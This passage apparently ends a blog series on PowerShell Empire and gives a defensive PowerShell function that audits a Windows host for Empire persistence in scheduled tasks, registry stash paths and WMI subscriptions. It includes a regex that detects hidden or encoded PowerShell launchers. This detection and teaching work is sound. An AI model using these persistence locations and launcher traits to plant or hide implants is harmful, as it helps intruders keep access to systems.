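Having set up all three, here is what I would run on a host to find them again. This is an added example, not code from the original post or from Empire. The task name, the two registry paths and the WMI subscription name default to the module option values shown above (Empire prints the second registry path as HKLM:SOFTWARE\... without a backslash after the colon; it resolves to the same key). The regex used to fingerprint a PowerShell launcher is a heuristic of my own.

```powershell
# Added example (not part of the original post or of Empire): audit a host for the
# three persistence mechanisms set up above. Task name, registry paths and the WMI
# subscription name default to the module option values shown on this page; the
# launcher regex is a generic heuristic of my own. Run from an elevated prompt.
function Get-PersistenceArtifacts {
    [CmdletBinding()]
    param(
        [string[]]$TaskNames = @('SecurityNik-Empire-Schtask'),
        [string[]]$RegPaths  = @('HKLM:\Software\Microsoft\Network\debug',
                                 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Debug'),
        [string[]]$SubNames  = @('Updater')
    )
    # Fingerprint of a PowerShell launcher: hidden/non-interactive/encoded, or one that
    # reads its payload back out of the registry.
    $launcher = '(?i)powershell.*(-enc|-w(indowstyle)?\s+hidden|-noni|-nop|Get-ItemProperty|gp\s+HK)'
    $findings = New-Object System.Collections.Generic.List[object]

    function New-Finding([string]$Type, [string]$Name, [string]$Detail) {
        if ($Detail.Length -gt 120) { $Detail = $Detail.Substring(0, 120) + '...' }
        [pscustomobject]@{ Type = $Type; Name = $Name; Detail = $Detail }
    }

    # 1. Scheduled tasks: match on name or on what the action launches.
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            $cmd = ("$($action.Execute) $($action.Arguments)").Trim()
            if (($TaskNames -contains $task.TaskName) -or ($cmd -match $launcher)) {
                $findings.Add((New-Finding 'ScheduledTask' "$($task.TaskPath)$($task.TaskName)" $cmd))
            }
        }
    }

    # 2. Registry. The modules store the launcher as a value named after the last path
    #    element (agent.log above: "stored in HKLM:\Software\Microsoft\Network\debug"),
    #    so check that value, then the path as a key, then the classic Run keys.
    foreach ($path in $RegPaths) {
        $parent = Split-Path -Path $path -Parent
        $leaf   = Split-Path -Path $path -Leaf
        if (Test-Path -LiteralPath $parent) {
            $value = (Get-Item -LiteralPath $parent).GetValue($leaf)
            if ($null -ne $value) { $findings.Add((New-Finding 'Registry' "$parent\$leaf" ([string]$value))) }
        }
        if (Test-Path -LiteralPath $path) {
            $key = Get-Item -LiteralPath $path
            foreach ($name in $key.GetValueNames()) {
                $findings.Add((New-Finding 'Registry' "$path\$name" ([string]$key.GetValue($name))))
            }
        }
    }
    $runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
               'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    foreach ($path in $runKeys) {
        if (-not (Test-Path -LiteralPath $path)) { continue }
        $key = Get-Item -LiteralPath $path
        foreach ($name in $key.GetValueNames()) {
            $value = [string]$key.GetValue($name)
            if ($value -match $launcher) { $findings.Add((New-Finding 'Registry' "$path\$name" $value)) }
        }
    }

    # 3. WMI: permanent subscriptions live in root\subscription. List every filter and
    #    command-line consumer and flag the suspicious ones; a benign "SCM Event Log
    #    Filter" is normally present.
    $ns = 'root\subscription'
    foreach ($f in @(Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue)) {
        $findings.Add((New-Finding 'WmiFilter' $f.Name $f.Query))
    }
    foreach ($c in @(Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue)) {
        $suspect = ($SubNames -contains $c.Name) -or ($c.CommandLineTemplate -match $launcher)
        $prefix = if ($suspect) { 'SUSPECT: ' } else { '' }
        $findings.Add((New-Finding 'WmiConsumer' $c.Name "$prefix$($c.CommandLineTemplate)"))
    }
    return $findings
}

# Usage (elevated prompt):
# Get-PersistenceArtifacts | Format-Table -AutoSize -Wrap
```

Names are the weakest signal here, since they are whatever the operator set; the regex on the task action, Run-key value and WMI consumer command line is what catches a renamed copy. The two stash paths are reported in full whenever they hold anything at all, because nothing legitimate writes script code there.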


10. That's it.

2021-11-21 19:14:07 : 
[!] Agent 73H864SX exiting: past killdate

There is so much more that can be learned here. However, this is enough for me at this point. I believe I have achieved my objective.

Other posts in this series:

Beginning Powershell Empire - The Attack in 10 steps
Powershell Empire Log Analysis
Powershell Empire Packet Analysis
Powershell Empire Detection with Snort
Powershell Empire - Detection with Zeek
